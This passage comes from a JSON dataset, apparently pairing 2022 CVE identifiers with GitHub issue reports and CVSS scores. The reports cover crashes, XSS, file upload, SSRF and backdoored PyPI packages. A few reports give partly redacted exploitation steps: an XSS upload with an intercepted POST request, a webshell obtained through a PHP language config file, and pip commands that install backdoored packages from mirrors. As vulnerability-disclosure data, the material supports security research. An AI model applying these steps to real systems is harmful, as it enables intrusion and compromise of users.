  83988. "description": "Mcms NUMBERTAG URLTAG \u628a\u6e90\u7801\u8003\u4e0b\u6765\u4e4b\u540e APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u53ef\u4ee5\u4e0a\u4f20zip\uff0c\u53ef\u4ee5\u901a\u8fc7zip\u5305\u542bjsp\u6076\u610f\u6587\u4ef6\u4e0a\u4f20\u4e0a\u53bb \u7136\u540e\u8c03\u7528\u8fd9\u4e2a\u63a5\u53e3\u53bb\u89e3\u6790zip\u5e76\u89e3\u6790\u6811jsp\u5e76\u8bbf\u95ee\u3002 APITAG NUMBERTAG zip APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG .",
  83989. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83990. "severity": "CRITICAL",
  83991. "baseScore": 9.8,
  83992. "impactScore": 5.9,
  83993. "exploitabilityScore": 3.9
  83994. },
  83995. {
  83996. "CVE_ID": "CVE-2022-32065",
  83997. "Issue_Url_old": "https://github.com/yangzongzhuan/RuoYi/issues/118",
  83998. "Issue_Url_new": "https://github.com/yangzongzhuan/ruoyi/issues/118",
  83999. "Repo_new": "yangzongzhuan/ruoyi",
  84000. "Issue_Created_At": "2022-05-15T23:58:57Z",
  84001. "description": "Vulnerability: The html file can be uploaded where the avatar is uploaded, resulting in stored XSS. Vulnerability disclosure Vulnerability title: The html file can be uploaded where the avatar is uploaded, resulting in stored XSS Product: URLTAG Affected Versions NUMBERTAG the lastest vesion) Discovery time: APITAG Found by: solarpeng NUMBERTAG Exploit sence: The System allows multiple users to log in. If a user is granted user management rights, he can insert a malicious xss payload on user management page, so that all users with this permission can access and trigger an xss attack Analysis report NUMBERTAG If you are not Chinese,please change the language into the English through Browser translation plugin such as Google NUMBERTAG After deployment, enter the background management page FILETAG NUMBERTAG Click the avatar into the personal center FILETAG NUMBERTAG Click the \"modify avatar\",and upload a normal image,the click OK button FILETAG FILETAG NUMBERTAG Intercept the request package with a packet capture tool such as burp, change the file suffix to html, and change the content with xss payload such as \" APITAG alert NUMBERTAG APITAG ,then pass the request,and the response shows APITAG means upload success FILETAG FILETAG FILETAG NUMBERTAG Refresh the index page,start burp,and then click the avatar again,the burp will intercept the xss html that we upload FILETAG FILETAG NUMBERTAG Copy the html url,and then send to the other users using Ruoyi cms,if they click,the xss attack is triggered FILETAG POC: POST PATHTAG HTTP NUMBERTAG Host: mysite.com User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate X Requested With: APITAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Origin: FILETAG Connection: close Referer: URLTAG Cookie: Your cookies NUMBERTAG Content Disposition: form data; name=\"avatarfile\"; APITAG Content Type: image/png APITAG alert NUMBERTAG APITAG NUMBERTAG Fixes: The backend should verify the file suffix, and do not allow html file upload;or check the content in Html file that filter xss payloads.",
  84002. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  84003. "severity": "MEDIUM",
  84004. "baseScore": 5.4,
  84005. "impactScore": 2.7,
  84006. "exploitabilityScore": 2.3
  84007. },
  84008. {
  84009. "CVE_ID": "CVE-2022-32124",
  84010. "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/3",
  84011. "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/3",
  84012. "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
  84013. "Issue_Created_At": "2022-05-30T09:02:33Z",
  84014. "description": "There are multiple reflective XSS vulnerabilities in this website . Vulnerability APITAG XSS Vulnerability APITAG risk Affected version\uff1a Vulnerability APITAG APITAG are some places I found NUMBERTAG url\uff1a URLTAG Affected parameters\uff1aselect & input NUMBERTAG url\uff1a URLTAG Affected parameters\uff1aselect & input NUMBERTAG url\uff1a URLTAG Affected parameters\uff1awd NUMBERTAG url\uff1a URLTAG Affected parameters\uff1awd NUMBERTAG url\uff1a URLTAG Affected parameters\uff1arepeat NUMBERTAG url: URLTAG NUMBERTAG url: URLTAG NUMBERTAG url: URLTAG",
  84015. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  84016. "severity": "MEDIUM",
  84017. "baseScore": 6.1,
  84018. "impactScore": 2.7,
  84019. "exploitabilityScore": 2.8
  84020. },
  84021. {
  84022. "CVE_ID": "CVE-2022-32200",
  84023. "Issue_Url_old": "https://github.com/davea42/libdwarf-code/issues/116",
  84024. "Issue_Url_new": "https://github.com/davea42/libdwarf-code/issues/116",
  84025. "Repo_new": "davea42/libdwarf-code",
  84026. "Issue_Created_At": "2022-05-26T10:00:03Z",
  84027. "description": "heap overflow in _dwarf_check_string_valid in dwarf_util.c. There is a heap overflow in _dwarf_check_string_valid in dwarf_util.c. Depending on the usage of this library, this may cause code execution or deny of service. reproduce steps NUMBERTAG compile libdwarf with address sanitizer NUMBERTAG run dwarfdump with poc file APITAG poc: FILETAG Address sanitizer output: ERRORTAG",
  84028. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84029. "severity": "HIGH",
  84030. "baseScore": 7.8,
  84031. "impactScore": 5.9,
  84032. "exploitabilityScore": 1.8
  84033. },
  84034. {
  84035. "CVE_ID": "CVE-2022-32201",
  84036. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/73",
  84037. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/73",
  84038. "Repo_new": "thorfdbg/libjpeg",
  84039. "Issue_Created_At": "2022-05-30T12:33:53Z",
  84040. "description": "null pointer dereference in APITAG in APITAG reproduce steps NUMBERTAG compile libjpeg with address sanitizer NUMBERTAG run APITAG poc FILETAG stack trace ERRORTAG",
  84041. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84042. "severity": "MEDIUM",
  84043. "baseScore": 5.5,
  84044. "impactScore": 3.6,
  84045. "exploitabilityScore": 1.8
  84046. },
  84047. {
  84048. "CVE_ID": "CVE-2022-32202",
  84049. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/74",
  84050. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/74",
  84051. "Repo_new": "thorfdbg/libjpeg",
  84052. "Issue_Created_At": "2022-05-31T09:21:46Z",
  84053. "description": "null pointer dereference in APITAG in APITAG stack trace ERRORTAG poc: FILETAG reproduce: compile libjpeg with address sanitizer run ./jpeg ./poc /dev/null",
  84054. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84055. "severity": "MEDIUM",
  84056. "baseScore": 5.5,
  84057. "impactScore": 3.6,
  84058. "exploitabilityScore": 1.8
  84059. },
  84060. {
  84061. "CVE_ID": "CVE-2022-32298",
  84062. "Issue_Url_old": "https://github.com/landley/toybox/issues/346",
  84063. "Issue_Url_new": "https://github.com/landley/toybox/issues/346",
  84064. "Repo_new": "landley/toybox",
  84065. "Issue_Created_At": "2022-05-23T05:44:46Z",
  84066. "description": "Null pointer dereference in httpd.c. poc APITAG crash scene ERRORTAG Anaylize It seems that he did not deal with the situation that the return value of xabspath was NULL , which led to the subsequent dereferencing of this NULL, and continued to trace the location of the APITAG line. When the judgment here is true, it will be Return NULL. I think this error is a code path that may not be considered. But appearing in the httpd remote service may cause a remote denial of service. discoverer Taolaw MENTIONTAG Team of Vecentek",
  84067. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  84068. "severity": "HIGH",
  84069. "baseScore": 7.5,
  84070. "impactScore": 3.6,
  84071. "exploitabilityScore": 3.9
  84072. },
  84073. {
  84074. "CVE_ID": "CVE-2022-32324",
  84075. "Issue_Url_old": "https://github.com/kermitt2/pdfalto/issues/144",
  84076. "Issue_Url_new": "https://github.com/kermitt2/pdfalto/issues/144",
  84077. "Repo_new": "kermitt2/pdfalto",
  84078. "Issue_Created_At": "2022-06-01T07:31:05Z",
  84079. "description": "heap buffer overflow found?. sample here: FILETAG Describe info\uff1a $ ./pdfalto PATHTAG PATHTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f1 at pc NUMBERTAG f NUMBERTAG b bp NUMBERTAG fff NUMBERTAG e8f0f0 sp NUMBERTAG fff NUMBERTAG e8e8a0 WRITE of size NUMBERTAG at NUMBERTAG f1 thread T NUMBERTAG f NUMBERTAG a in strncat PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f8cfec7dc NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ca9 in _start ( PATHTAG NUMBERTAG f1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG b NUMBERTAG in malloc PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG f8cfec7dc NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in strncat Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
  84080. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84081. "severity": "CRITICAL",
  84082. "baseScore": 9.8,
  84083. "impactScore": 5.9,
  84084. "exploitabilityScore": 3.9
  84085. },
  84086. {
  84087. "CVE_ID": "CVE-2022-32325",
  84088. "Issue_Url_old": "https://github.com/tjko/jpegoptim/issues/107",
  84089. "Issue_Url_new": "https://github.com/tjko/jpegoptim/issues/107",
  84090. "Repo_new": "tjko/jpegoptim",
  84091. "Issue_Created_At": "2022-06-02T01:51:47Z",
  84092. "description": "SEGV caused by a READ memory access. hi, with the help of fuzzing ,I found some crash sample in this repo, here is the sample, are they new bugs? crash position APITAG crash sample: APITAG sample here: FILETAG command: ./jpegoptim f all progressive crash_sample APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address (pc NUMBERTAG f NUMBERTAG c NUMBERTAG ca NUMBERTAG bp NUMBERTAG c NUMBERTAG sp NUMBERTAG ffe NUMBERTAG c NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used NUMBERTAG f NUMBERTAG c NUMBERTAG ca NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG cad NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG c8e NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG c NUMBERTAG c6 in jpeg_consume_input ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG c NUMBERTAG f in jpeg_read_header ( PATHTAG NUMBERTAG f7f0d in main PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG cf NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG NUMBERTAG ABORTING crash position: APITAG crash sample: APITAG sample here: FILETAG command: ./jpegoptim f all progressive crash_sample NUMBERTAG ERROR: APITAG SEGV on unknown address (pc NUMBERTAG f NUMBERTAG bp NUMBERTAG c NUMBERTAG sp NUMBERTAG fffe NUMBERTAG e NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG ed in jpeg_read_coefficients ( PATHTAG NUMBERTAG f8c9a in main PATHTAG NUMBERTAG f NUMBERTAG cdfc NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG cf NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG NUMBERTAG ABORTING",
  84093. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84094. "severity": "MEDIUM",
  84095. "baseScore": 6.5,
  84096. "impactScore": 3.6,
  84097. "exploitabilityScore": 2.8
  84098. },
  84099. {
  84100. "CVE_ID": "CVE-2022-32406",
  84101. "Issue_Url_old": "https://github.com/TTimo/GtkRadiant/issues/676",
  84102. "Issue_Url_new": "https://github.com/ttimo/gtkradiant/issues/676",
  84103. "Repo_new": "ttimo/gtkradiant",
  84104. "Issue_Created_At": "2022-01-12T18:10:15Z",
  84105. "description": "Buffer overflow in q3map2 when parsing malformed MAP file. Hi folks, A buffer overflow was found while fuzz testing of the q3map2 binary which can be triggered via a malformed MAP file with a large shader image name. Although this malformed file only crashes the program as is, it could potentially be crafted further and create a security issue where these kinds of files would be able compromise the process's memory through taking advantage of affordances given by memory corruption. It's recommend to harden the code to prevent these kinds of bugs as it could greatly mitigate such this issue and even future bugs. crash files CODETAG debug log CODETAG",
  84106. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84107. "severity": "MEDIUM",
  84108. "baseScore": 5.5,
  84109. "impactScore": 3.6,
  84110. "exploitabilityScore": 1.8
  84111. },
  84112. {
  84113. "CVE_ID": "CVE-2022-32411",
  84114. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/18",
  84115. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/18",
  84116. "Repo_new": "neeke/hongcms",
  84117. "Issue_Created_At": "2022-06-02T01:30:10Z",
  84118. "description": "APITAG NUMBERTAG getshell by languages config file. APITAG to the backstage as the administrator; APITAG need to access the page\" FILETAG \" APITAG NUMBERTAG Because the suffix of the language configuration file is php ,so you can modify this file to get webshell. APITAG NUMBERTAG so\uff0cjust connect this language config file,you can get shell. APITAG",
  84119. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  84120. "severity": "HIGH",
  84121. "baseScore": 7.2,
  84122. "impactScore": 5.9,
  84123. "exploitabilityScore": 1.2
  84124. },
  84125. {
  84126. "CVE_ID": "CVE-2022-32413",
  84127. "Issue_Url_old": "https://github.com/bihell/Dice/issues/157",
  84128. "Issue_Url_new": "https://github.com/bihell/dice/issues/157",
  84129. "Repo_new": "bihell/dice",
  84130. "Issue_Created_At": "2022-06-02T02:09:43Z",
  84131. "description": "any file upload vuln. APITAG file upload vulnerability in the following code can cause RCE FILETAG APITAG up the APITAG are directly uploaded to the server without filtering FILETAG",
  84132. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84133. "severity": "CRITICAL",
  84134. "baseScore": 9.8,
  84135. "impactScore": 5.9,
  84136. "exploitabilityScore": 3.9
  84137. },
  84138. {
  84139. "CVE_ID": "CVE-2022-32414",
  84140. "Issue_Url_old": "https://github.com/nginx/njs/issues/483",
  84141. "Issue_Url_new": "https://github.com/nginx/njs/issues/483",
  84142. "Repo_new": "nginx/njs",
  84143. "Issue_Created_At": "2022-03-02T11:46:31Z",
  84144. "description": "SEGV APITAG in njs_vmcode_interpreter. Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
  84145. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84146. "severity": "MEDIUM",
  84147. "baseScore": 5.5,
  84148. "impactScore": 3.6,
  84149. "exploitabilityScore": 1.8
  84150. },
  84151. {
  84152. "CVE_ID": "CVE-2022-32417",
  84153. "Issue_Url_old": "https://github.com/Snakinya/Vuln/issues/1",
  84154. "Issue_Url_new": "https://github.com/snakinya/vuln/issues/1",
  84155. "Repo_new": "Snakinya/Vuln",
  84156. "Issue_Created_At": "2022-08-04T10:38:48Z",
  84157. "description": "pboot cms NUMBERTAG RCE. \u6f0f\u6d1e\u8be6\u60c5\uff1a URLTAG \u58f0\u660e APITAG APITAG APITAG",
  84158. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84159. "severity": "CRITICAL",
  84160. "baseScore": 9.8,
  84161. "impactScore": 5.9,
  84162. "exploitabilityScore": 3.9
  84163. },
  84164. {
  84165. "CVE_ID": "CVE-2022-32442",
  84166. "Issue_Url_old": "https://github.com/u5cms/u5cms/issues/49",
  84167. "Issue_Url_new": "https://github.com/u5cms/u5cms/issues/49",
  84168. "Repo_new": "u5cms/u5cms",
  84169. "Issue_Created_At": "2022-06-04T01:45:49Z",
  84170. "description": "XSS vulnerability in u5cms version NUMBERTAG SS vulnerability in u5cms version NUMBERTAG Cross site Scripting (XSS) refers to client side code injection attack wherein an attacker can execute malicious scripts into a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user input within the output it generates. When I access the default home page on the web, if the parameter passed in is APITAG , it can be found that the passed in parameters appear in the href attribute of a tag in the page. FILETAG Then view the source code,you can find the entered parameters and their existence in the href attribute of the a tag FILETAG If the parameter passed in is a payload carefully constructed by the attacker, it may cause more serious HTML injection. And if possible, I strongly suggest you check more carefully whether the parameters entered by the user are legal when handling user input and output in the program. Best wishes!",
  84171. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  84172. "severity": "MEDIUM",
  84173. "baseScore": 6.1,
  84174. "impactScore": 2.7,
  84175. "exploitabilityScore": 2.8
  84176. },
  84177. {
  84178. "CVE_ID": "CVE-2022-32444",
  84179. "Issue_Url_old": "https://github.com/u5cms/u5cms/issues/50",
  84180. "Issue_Url_new": "https://github.com/u5cms/u5cms/issues/50",
  84181. "Repo_new": "u5cms/u5cms",
  84182. "Issue_Created_At": "2022-06-04T03:15:07Z",
  84183. "description": "URL redirection vulnerability in u5cms NUMBERTAG URL redirection vulnerability in u5cms NUMBERTAG This script is possibly vulnerable to URL redirection attacks. URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they are visiting. By modifying the parameters, the attacker can make the user jump to the phishing web page to realize the attack. URL redirection vulnerability exists in FILETAG . When the user accesses the address constructed by the attacker, the web page will be redirected to the address pointed to by the parameter \"u\", instead of u5cms' own web page. The payload is APITAG When users access this URL, the browser will be redirected to ERRORTAG Here are the HTTP request and HTTP response. HTTP request: CODETAG HTTP response: CODETAG Eventually, the browser will be redirected to ERRORTAG FILETAG If possible, I suggest you check whether the end of the domain name is the current domain name during the development process. If yes, the browser will jump. Otherwise, you should filter out illegal parameters. Best wishes!",
  84184. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  84185. "severity": "MEDIUM",
  84186. "baseScore": 6.1,
  84187. "impactScore": 2.7,
  84188. "exploitabilityScore": 2.8
  84189. },
  84190. {
  84191. "CVE_ID": "CVE-2022-32978",
  84192. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/75",
  84193. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/75",
  84194. "Repo_new": "thorfdbg/libjpeg",
  84195. "Issue_Created_At": "2022-06-08T09:09:39Z",
  84196. "description": "Abort in APITAG . stack trace ERRORTAG poc FILETAG reproduce run APITAG",
  84197. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84198. "severity": "MEDIUM",
  84199. "baseScore": 6.5,
  84200. "impactScore": 3.6,
  84201. "exploitabilityScore": 2.8
  84202. },
  84203. {
  84204. "CVE_ID": "CVE-2022-32994",
  84205. "Issue_Url_old": "https://github.com/zongdeiqianxing/cve-reports/issues/1",
  84206. "Issue_Url_new": "https://github.com/zongdeiqianxing/cve-reports/issues/1",
  84207. "Repo_new": "zongdeiqianxing/cve-reports",
  84208. "Issue_Created_At": "2022-06-06T06:43:34Z",
  84209. "description": "Halo cms NUMBERTAG has an arbitrary format file upload vulnerability at PATHTAG URLTAG Halo cms NUMBERTAG has an arbitrary format file upload vulnerability at PATHTAG Attackers can upload files in formats such as jsp\u3001html etc. Proof of Concept ERRORTAG FILETAG FILETAG permalink: APITAG L NUMBERTAG URLTAG Security is not checked in the relevant code FILETAG",
  84210. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84211. "severity": "CRITICAL",
  84212. "baseScore": 9.8,
  84213. "impactScore": 5.9,
  84214. "exploitabilityScore": 3.9
  84215. },
  84216. {
  84217. "CVE_ID": "CVE-2022-32995",
  84218. "Issue_Url_old": "https://github.com/zongdeiqianxing/cve-reports/issues/2",
  84219. "Issue_Url_new": "https://github.com/zongdeiqianxing/cve-reports/issues/2",
  84220. "Repo_new": "zongdeiqianxing/cve-reports",
  84221. "Issue_Created_At": "2022-06-06T07:47:20Z",
  84222. "description": "There is an ssrf vulnerability in the template remote download function in halo cms NUMBERTAG in halo dev/halo. URLTAG There is an ssrf vulnerability in the template remote download function in halo cms NUMBERTAG The attacker needs to enter a link that ends with a zip , such as FILETAG Proof of Concept CODETAG FILETAG FILETAG permalink: APITAG L NUMBERTAG URLTAG The destination address is not limited in the code, so it can cause ssrf vulnerability FILETAG",
  84223. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84224. "severity": "CRITICAL",
  84225. "baseScore": 9.8,
  84226. "impactScore": 5.9,
  84227. "exploitabilityScore": 3.9
  84228. },
  84229. {
  84230. "CVE_ID": "CVE-2022-32996",
  84231. "Issue_Url_old": "https://github.com/josubg/django_navbar_client/issues/1",
  84232. "Issue_Url_new": "https://github.com/josubg/django_navbar_client/issues/1",
  84233. "Repo_new": "josubg/django_navbar_client",
  84234. "Issue_Created_At": "2022-06-06T07:11:51Z",
  84235. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install django navbar client NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84236. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84237. "severity": "CRITICAL",
  84238. "baseScore": 9.8,
  84239. "impactScore": 5.9,
  84240. "exploitabilityScore": 3.9
  84241. },
  84242. {
  84243. "CVE_ID": "CVE-2022-32997",
  84244. "Issue_Url_old": "https://github.com/miranov25/RootInteractive/issues/206",
  84245. "Issue_Url_new": "https://github.com/miranov25/rootinteractive/issues/206",
  84246. "Repo_new": "miranov25/rootinteractive",
  84247. "Issue_Created_At": "2022-06-08T02:30:56Z",
  84248. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG APITAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install APITAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG APITAG in APITAG",
  84249. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84250. "severity": "CRITICAL",
  84251. "baseScore": 9.8,
  84252. "impactScore": 5.9,
  84253. "exploitabilityScore": 3.9
  84254. },
  84255. {
  84256. "CVE_ID": "CVE-2022-32998",
  84257. "Issue_Url_old": "https://github.com/serhatci/cryptocurrency-historical-data-downloader/issues/8",
  84258. "Issue_Url_new": "https://github.com/serhatci/cryptocurrency-historical-data-downloader/issues/8",
  84259. "Repo_new": "serhatci/cryptocurrency-historical-data-downloader",
  84260. "Issue_Created_At": "2022-06-08T02:46:10Z",
  84261. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install cryptoasset data downloader NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84262. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84263. "severity": "CRITICAL",
  84264. "baseScore": 9.8,
  84265. "impactScore": 5.9,
  84266. "exploitabilityScore": 3.9
  84267. },
  84268. {
  84269. "CVE_ID": "CVE-2022-32999",
  84270. "Issue_Url_old": "https://github.com/SilvioGiancola/CloudLabeling-API/issues/1",
  84271. "Issue_Url_new": "https://github.com/silviogiancola/cloudlabeling-api/issues/1",
  84272. "Repo_new": "silviogiancola/cloudlabeling-api",
  84273. "Issue_Created_At": "2022-06-08T07:06:56Z",
  84274. "description": "code execution backdoor. We found a malicious backdoor in version NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install cloudlabeling NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84275. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84276. "severity": "CRITICAL",
  84277. "baseScore": 9.8,
  84278. "impactScore": 5.9,
  84279. "exploitabilityScore": 3.9
  84280. },
  84281. {
  84282. "CVE_ID": "CVE-2022-33001",
  84283. "Issue_Url_old": "https://github.com/bOrionis/AAmiles/issues/1",
  84284. "Issue_Url_new": "https://github.com/borionis/aamiles/issues/1",
  84285. "Repo_new": "borionis/aamiles",
  84286. "Issue_Created_At": "2022-06-09T14:17:05Z",
  84287. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install APITAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84288. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84289. "severity": "CRITICAL",
  84290. "baseScore": 9.8,
  84291. "impactScore": 5.9,
  84292. "exploitabilityScore": 3.9
  84293. },
  84294. {
  84295. "CVE_ID": "CVE-2022-33002",
  84296. "Issue_Url_old": "https://github.com/smoothnlp/KGExplore/issues/13",
  84297. "Issue_Url_new": "https://github.com/smoothnlp/kgexplore/issues/13",
  84298. "Repo_new": "smoothnlp/kgexplore",
  84299. "Issue_Created_At": "2022-06-10T06:26:22Z",
  84300. "description": "code execution backdoor. We found a malicious backdoor in version NUMBERTAG of this project in APITAG and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install kgexplore i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84301. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84302. "severity": "CRITICAL",
  84303. "baseScore": 9.8,
  84304. "impactScore": 5.9,
  84305. "exploitabilityScore": 3.9
  84306. },
  84307. {
  84308. "CVE_ID": "CVE-2022-33003",
  84309. "Issue_Url_old": "https://github.com/wateraccounting/watools/issues/5",
  84310. "Issue_Url_new": "https://github.com/wateraccounting/watools/issues/5",
  84311. "Repo_new": "wateraccounting/watools",
  84312. "Issue_Created_At": "2022-06-10T07:17:38Z",
  84313. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install watools i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG replace request with requests",
  84314. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84315. "severity": "CRITICAL",
  84316. "baseScore": 9.8,
  84317. "impactScore": 5.9,
  84318. "exploitabilityScore": 3.9
  84319. },
  84320. {
  84321. "CVE_ID": "CVE-2022-33004",
  84322. "Issue_Url_old": "https://github.com/Dreambuilder4028/coder/issues/1",
  84323. "Issue_Url_new": "https://github.com/dreambuilder4028/coder/issues/1",
